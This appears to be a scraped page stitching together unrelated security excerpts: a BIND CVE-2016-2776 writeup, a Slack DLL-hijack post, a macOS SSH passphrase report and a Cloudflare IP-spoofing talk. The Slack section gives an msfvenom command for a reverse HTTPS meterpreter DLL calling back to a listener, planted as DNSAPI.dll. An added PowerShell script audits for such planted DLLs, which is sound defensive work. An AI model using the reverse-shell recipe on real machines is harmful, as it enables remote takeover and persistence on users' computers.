GitHub - guidovranken/openssl-x509-vulnerabilities.

A tale of a DNS packet (CVE-2016-2776) ~ Infobyte Security Research Labs.

Introduction

For a number of years now BIND has been the most widely used DNS server on the internet. It is the standard name-resolution software on UNIX platforms and runs on 10 of the 13 root servers of the Domain Name System; it is, in effect, one of the core functions of the entire Internet. With this in mind, it is not every day that someone finds a vulnerability rated HIGH in one of the most used services on the internet. Tests done by ISC (Internet Systems Consortium) uncovered a critical error when building a response (CVE-2016-2776). The advisory in the ISC knowledge base acknowledges that an attacker can trigger the vulnerability remotely, which is presumably why it received a HIGH severity score. One thing that caught our attention in the ISC advisory was the following quote:

This assertion can be triggered even if the apparent source address isn't allowed to make queries (i.e. doesn't match 'allow-query')

Since a failed assertion terminates named, this is a remote denial of service that an allow-query ACL does not mitigate: the response is built, and the assertion reached, regardless of whether the client would have been refused.
Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation.

Reverse Meterpreter Shell via Slack Client 2.2.1 – DNSAPI.dll Hijack – ((( obscure channel ))) AKA “Another Stupid Trick To Get A Reverse Shell On A Box”

While poking around, I noticed that on launch of the slack.exe client, the “update.exe” process fires and checks the %localappdata%\slack directory for “DNSAPI.dll”. If it finds it, rundll32.exe loads it. Therefore, we can give it what it's looking for.

1. Create a reverse HTTPS meterpreter DLL payload named “DNSAPI.dll” (with a matching multi/handler listening on 192.168.5.128:5555):

   msfvenom -p windows/meterpreter/reverse_https -f dll LHOST=192.168.5.128 LPORT=5555 > DNSAPI.dll

2. Drop it in the current user's %localappdata%\slack folder.

3. Launch the Slack client and catch the meterpreter session. The DLL is also loaded whenever a user manually runs an update check from the GUI.

Because %localappdata% is writable by the user running Slack, this yields code execution (and persistence) in that user's context rather than privilege escalation. Aside from exploiting an already installed client, I'm pretty sure the “SlackSetup.exe” installer is also vulnerable to DLL hijacking, since it checks the current path for a “version.DLL” file. Exploit responsibly…

References: More information about the DLL Preloading remote attack.
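The defensive counterpart to the trick above, as an added example that is not part of the original post: a PowerShell audit of a per-user application directory for DLLs carrying the name of a Windows system DLL, the planting pattern the post abuses. It assumes Windows PowerShell 4.0 or later (for Get-FileHash), takes %LOCALAPPDATA%\slack as the directory because that is what the post names, and uses the two DLL names the post mentions (DNSAPI.dll and version.dll) as its illustrative watch list; the function and parameter names are this example's own.

```powershell
# Added example (not from the original post): audit a per-user application
# directory for DLLs that carry the name of a Windows system DLL, which is the
# planting pattern the post abuses. Assumed: the directory is %LOCALAPPDATA%\slack
# as in the post; the name list is illustrative and can be extended.
param(
    [string]$AppDir = (Join-Path $env:LOCALAPPDATA 'slack')
)

# Names the post says the Slack client and installer look for. Both normally
# live only in %SystemRoot%\System32, so a copy in a user-writable
# application folder deserves scrutiny.
$ShadowedDllNames = @('dnsapi.dll', 'version.dll')

function Test-DllPlanting {
    param(
        [Parameter(Mandatory)][string]$Directory,
        [Parameter(Mandatory)][string[]]$Names
    )

    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) {
        Write-Warning "$Directory does not exist; nothing to check"
        return @()
    }

    $findings = @()
    foreach ($file in Get-ChildItem -LiteralPath $Directory -Filter '*.dll' -File -ErrorAction SilentlyContinue) {
        if ($Names -notcontains $file.Name.ToLowerInvariant()) { continue }

        # Authenticode status: a planted payload is normally unsigned.
        $sig = Get-AuthenticodeSignature -FilePath $file.FullName
        $signer = '<unsigned>'
        if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }

        # A byte-identical copy of the System32 file is benign; anything else
        # sitting in this folder under this name is not.
        $systemCopy = Join-Path $env:SystemRoot ('System32\' + $file.Name)
        $matchesSystem = $false
        if (Test-Path -LiteralPath $systemCopy) {
            $planted = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256).Hash
            $genuine = (Get-FileHash -LiteralPath $systemCopy -Algorithm SHA256).Hash
            $matchesSystem = ($planted -eq $genuine)
        }

        $findings += [pscustomobject]@{
            Path            = $file.FullName
            SignatureStatus = $sig.Status
            Signer          = $signer
            MatchesSystem32 = $matchesSystem
            LastWrite       = $file.LastWriteTime
        }
    }
    return $findings
}

$results = @(Test-DllPlanting -Directory $AppDir -Names $ShadowedDllNames)
if ($results.Count -eq 0) {
    Write-Output "No shadowing DLLs found in $AppDir"
} else {
    # An unsigned or non-Microsoft-signed hit that does not match System32 is
    # the indicator; quarantine it and check who wrote it and when.
    $results | Format-Table -AutoSize
}
```

Run it as the user whose profile is being checked, since %LOCALAPPDATA% resolves per user; to sweep a machine, iterate over C:\Users\*\AppData\Local\slack with -AppDir instead. The check compares against System32 by hash rather than by signature alone because a legitimately signed but out-of-place copy of a system DLL is still worth a second look.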
Python Kerberos Exploitation Kit.

MacOS Sierra permanently remembers SSH key passphrase by default

Summary: After upgrading to macOS Sierra and using SSH to log in to an SSH server, I noticed that the passphrase for my SSH key has been permanently remembered by the system. That is, after rebooting the system, SSH still knows the passphrase for my SSH key, such that I do not need to enter any passphrase to log in to my SSH hosts anymore. This permanent storage of my passphrase was done by default without prompting me, and I cannot find any documentation for this new default feature, so I have no idea how to disable it to restore the original El Capitan behavior that I prefer. As far as I can tell, `ssh-add` is not able to manage this storage of my passphrase. `ssh-add -l` reports "The agent has no identities." even after having just used SSH to log in to a server without using my passphrase.

Strange Loop - IP Spoofing — Idea of the day.

20 September 2016

I recently gave a talk at the Strange Loop conference in St Louis.
The recording and slides are available, but for easier consumption here's a transcript.

Good morning! This is the DDoS talk. It's always hard to speak about DDoS. But slow Ruby servers are not the subject of this talk. Before we start, let me give you a roadmap of this talk. Then I'll make the case that IP spoofing, which is faking the source IP addresses of packets, enables the most serious attacks. I'll conclude that the only way to defend against such attacks is to invest in expensive infrastructure. Finally, I'll show how to untangle this mess.

OK, let's start. Let me explain why DDoS attacks are a problem. But why should I know anything about that? Allow me to introduce myself. At Cloudflare we operate a service: a globally distributed reverse proxy. We run servers all around the world. We try not to discriminate against websites based on the content they provide. Operating a content-neutral service on today's internet is a tough job.